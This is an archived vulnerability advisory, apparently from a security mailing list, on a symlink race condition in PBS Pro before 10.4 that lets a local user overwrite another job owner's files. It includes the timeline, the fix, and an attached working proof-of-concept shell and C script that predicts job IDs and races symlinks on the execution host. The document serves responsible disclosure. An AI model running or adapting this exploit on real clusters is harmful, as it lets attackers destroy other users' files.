AOH :: HP Unsorted P :: B1A-1422.HTM

PBS Pro race condition vulnerability



PBS Pro race condition vulnerability
PBS Pro race condition vulnerability



This is a multi-part message in MIME format.

--Boundary_(ID_AnwLdOHoJXd5dsgygcys6Q)
Content-type: text/plain; charset=UTF-8
Content-transfer-encoding: 7BIT

Application:  PBS Pro (part od PBS Works by Altair Engineering)
Affected version: < 10.4
OS:  Linux/UNIX
CVE ID:   pending
Class:      temporary file creation race condition
Remote:  no
Threat:  destroy arbitrary choosen file of other user
Discovered: 02.02.2010
Discovered by: Bartlomiej Balcerek

Background:

PBS Pro is a commercial software used to perform and manage job
scheduling and execution.
It is widely used by supercomputing centers for cluster, grid and cloud
computing.

Vulnerability description:

PBS Pro execution deamon - pbs_mom - uses /var/spool/pbs/spool directory
to store
temporary files. This directory is world writable. Files within this
directory are
created on behalf of queue user (with his/her UID and GID) to store jobs
standard
output and error streams. Before pbs_mom creates a particular file, it
performs a
check whether file of that name already exists. If so, file of such name
is deleted
and than opened in write mode. It is possible to attacker to easily
guess other user
temporary file name and create arbitrary link between two actions of
check and create,
while other user job is executed. Link could point to choosen by
attacker file
owned by jobs owner, which in consequence will be overwritten by jobs
standard
output or error streams.

Exploit:

PoC attached.

Solution:

Upgrade to version >= 10.4

Bug history:

Discovered: 02.02.2010
Vendor contacted: 15.02.2010
Fixed version announced: 08.06.2010
Bug disclosed: 07.07.2010

--
Bartlomiej Balcerek


--Boundary_(ID_AnwLdOHoJXd5dsgygcys6Q)
Content-type: application/x-sh; name=pbs-v10.2.0.93147-PoC.sh
Content-transfer-encoding: 7bit
Content-disposition: attachment; filename=pbs-v10.2.0.93147-PoC.sh

#!/bin/bash
#set -x
# PBS Pro < 10.4 o+w race condition vulnerability Proof Of Concept by Bartlomiej Balcerek - bartol@pwr.wroc.pl 
# Must be run on submitting host and will create /tmp/pbs_test_by_bartol file on exec host as a next job owner UID
echo Compiling racer...
cat << EOF  | gcc -x c -o racer.x -
//repeatedly tries to create arbitrary choosen link
#include 

int main(int argc, char* argv[])
{
 if (argc < 3)  {printf("%s","Need 2 arguments!");exit(1);}
 while (1) symlink(argv[1],argv[2]); 
}; 
EOF
if [ ! -x racer.x ]; then echo "Cannot compile C code, do you have gcc installed ?" ;exit 1; fi 
echo Submitting job...
jobname=`echo hostname | qsub -j oe -o out.txt` 
sleep 2
host=`cat out.txt`
if [ -z $host ]; then echo "Cannot determine next execution host, is quere working ?"; exit 1;fi
rm out.txt
echo Next job will be run on $host
echo Copying racer to $host...
scp ./racer.x $host:/tmp
echo Calculating job id...
jobid=`echo $jobname | cut -d . -f 1`
jobid=$(($jobid+1))
if [ ! $jobid -ge 0 ]; then echo "Cannot determine next job ID!";exit 1;fi
echo Next job ID will be $jobid
hostname=`echo $jobname | cut -d . -f 2`
echo Running racer...submit job as different user, than push Ctrl+C after while.
ssh $host -- \(/tmp/racer.x /tmp/pbs_test_by_bartol /var/spool/pbs/spool/${jobid}.${hostname}.OU \)
ssh $host -- killall racer.x
echo /var/spool/pbs/spool on $host content:
ssh $host -- ls -latr /var/spool/pbs/spool
echo Cleaning up...
ssh $host -- unlink /var/spool/pbs/spool/${jobid}.${hostname}.OU
ssh $host -- ls -latr /var/spool/pbs/spool
ssh $host --  rm -v /tmp/racer.x
rm -v racer.x





--Boundary_(ID_AnwLdOHoJXd5dsgygcys6Q)--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.